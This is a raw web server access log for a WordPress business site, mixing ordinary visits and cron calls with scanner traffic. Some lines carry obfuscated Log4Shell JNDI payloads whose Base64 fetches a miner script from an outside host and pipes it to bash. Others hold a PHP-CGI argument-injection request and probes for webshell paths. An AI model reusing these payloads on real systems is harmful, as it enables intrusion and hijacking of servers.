52.165.233.180 - - [09/Sep/2025:10:42:54 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:54 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:54 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:55 +0800] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:55 +0800] "GET /admin/function.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:55 +0800] "GET /wp-admin/network/chosen.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:55 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:56 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:56 +0800] "GET /wp-includes/assets/admin.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:56 +0800] "GET /wp-includes/images/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:57 +0800] "GET /.well-known/classwithtostring.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:57 +0800] "GET /anonse/lock360.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:57 +0800] "GET /cgi-bin/wp-login.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:57 +0800] "GET /wp-admin/css/colors/ectoplasm/wp-login.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:58 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:58 +0800] "GET /wp-content/uploads/2021/ HTTP/1.1" 404 31381 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:59 +0800] "GET /wp-includes/html-api/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:59 +0800] "GET /assets/images/doc.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:42:59 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:00 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:00 +0800] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:00 +0800] "GET /wp-admin/includes/cloud.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:00 +0800] "GET /wp-admin/includes/index.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:01 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:01 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:01 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:01 +0800] "GET /functions.php HTTP/1.1" 404 27 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:02 +0800] "GET /modules/ HTTP/1.1" 404 31381 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:03 +0800] "GET /wp-admin/css/colors/ocean/ HTTP/1.1" 403 146 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:04 +0800] "GET /admin/upload/ HTTP/1.1" 404 31381 "-" "-"
52.165.233.180 - - [09/Sep/2025:10:43:04 +0800] "GET /ccx/index.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [09/Sep/2025:10:49:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757386192.7734630107879638671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [09/Sep/2025:10:49:53 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Sep/2025:10:51:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757386272.4705300331115722656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.79.226 - - [09/Sep/2025:10:51:12 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.71 - - [09/Sep/2025:10:51:13 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.227 - - [09/Sep/2025:10:51:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.154 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [09/Sep/2025:10:51:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.154 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [09/Sep/2025:10:53:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757386392.8621220588684082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [09/Sep/2025:10:53:13 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Sep/2025:11:07:34 +0800] "POST /wp-cron.php?doing_wp_cron=1757387254.0196819305419921875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [09/Sep/2025:11:07:34 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8991 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [09/Sep/2025:11:34:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757388892.6395421028137207031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.217.192.36 - - [09/Sep/2025:11:34:52 +0800] "GET /gl01 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
103.217.192.36 - - [09/Sep/2025:11:34:53 +0800] "GET /gl01 HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
47.237.177.222 - - [09/Sep/2025:11:35:09 +0800] "GET http://passport.baidu.com/ HTTP/1.1" 200 33467 "-" "-"
36.133.115.36 - - [09/Sep/2025:11:37:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757389041.0016379356384277343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [09/Sep/2025:11:37:21 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [09/Sep/2025:11:37:21 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [09/Sep/2025:11:37:23 +0800] "GET /$%7B$%7Bupper::-j%7D$%7Bupper::-n%7D$%7B::-d%7D$%7Bupper::-i%7D:$%7Bupper::-l%7D$%7Bupper::-d%7D$%7Bupper::-a%7D$%7Bupper::-p%7D://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1" 301 5 "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [09/Sep/2025:11:37:23 +0800] "GET /%7B%7Bupper::-j%7D%7Bupper::-n%7D%7B::-d%7D%7Bupper::-i%7D:%7Bupper::-l%7D%7Bupper::-d%7D%7Bupper::-a%7D%7Bupper::-p%7D:/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [09/Sep/2025:11:37:26 +0800] "GET /$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B::-p%7D://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1" 301 5 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [09/Sep/2025:11:37:26 +0800] "GET /%7B%7B::-j%7D%7B::-n%7D%7B::-d%7D%7B::-i%7D:%7B::-l%7D%7B::-d%7D%7B::-a%7D%7B::-p%7D:/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [09/Sep/2025:11:37:28 +0800] "GET /$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B::-p%7D://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 301 5 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw=="
80.75.212.83 - - [09/Sep/2025:11:37:30 +0800] "GET /%7B%7B::-j%7D%7B::-n%7D%7B::-d%7D%7B::-i%7D:%7B::-l%7D%7B::-d%7D%7B::-a%7D%7B::-p%7D:/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vMzEuMTUuMTYuMjUyL3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw=="
36.133.115.36 - - [09/Sep/2025:11:43:34 +0800] "POST /wp-cron.php?doing_wp_cron=1757389414.9062259197235107421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [09/Sep/2025:11:43:35 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Sep/2025:11:51:34 +0800] "POST /wp-cron.php?doing_wp_cron=1757389894.5641839504241943359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.131.243.61 - - [09/Sep/2025:11:51:34 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:03:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757390603.6197469234466552734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [09/Sep/2025:12:03:23 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.135.115.233 - - [09/Sep/2025:12:03:37 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:05:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757390726.7847158908843994140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.158.91.71 - - [09/Sep/2025:12:05:26 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.158.91.71 - - [09/Sep/2025:12:05:29 +0800] "GET /services/ HTTP/1.1" 200 19770 "http://cqqizhou.com/services" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:07:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757390849.0002050399780273437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.26.144.51 - - [09/Sep/2025:12:07:29 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [09/Sep/2025:12:16:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757391370.6251840591430664062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.86.78 - - [09/Sep/2025:12:16:10 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840 HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:22:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757391724.0912609100341796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.148.137 - - [09/Sep/2025:12:22:04 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
91.224.92.17 - - [09/Sep/2025:12:23:01 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
43.153.10.83 - - [09/Sep/2025:12:27:19 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:27:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757392058.0181400775909423828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [09/Sep/2025:12:27:38 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Sep/2025:12:31:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757392281.6906659603118896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.95.131 - - [09/Sep/2025:12:31:22 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
119.28.89.249 - - [09/Sep/2025:12:37:07 +0800] "GET /wp-content/uploads/2025/07/1751857929-3D-one-stop-supply-chain-service-W900px2.webp HTTP/1.1" 200 38362 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:41:19 +0800] "POST /wp-cron.php?doing_wp_cron=1757392879.6572749614715576171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.172.39 - - [09/Sep/2025:12:41:19 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
91.208.184.195 - - [09/Sep/2025:12:41:39 +0800] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 404 8990 "-" "python-requests/2.27.1"
43.167.245.18 - - [09/Sep/2025:12:44:19 +0800] "GET /wp-content/uploads/2025/07/1751829518-Precision-processing-services800x500.webp HTTP/1.1" 200 28964 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:51:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757393498.5569329261779785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.188.157 - - [09/Sep/2025:12:51:38 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.188.157 - - [09/Sep/2025:12:51:41 +0800] "GET /logistics/ HTTP/1.1" 200 18248 "http://36.133.115.36:80/logistics" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Sep/2025:12:55:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757393757.8286828994750976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.35.153 - - [09/Sep/2025:12:55:57 +0800] "GET /process/processing HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
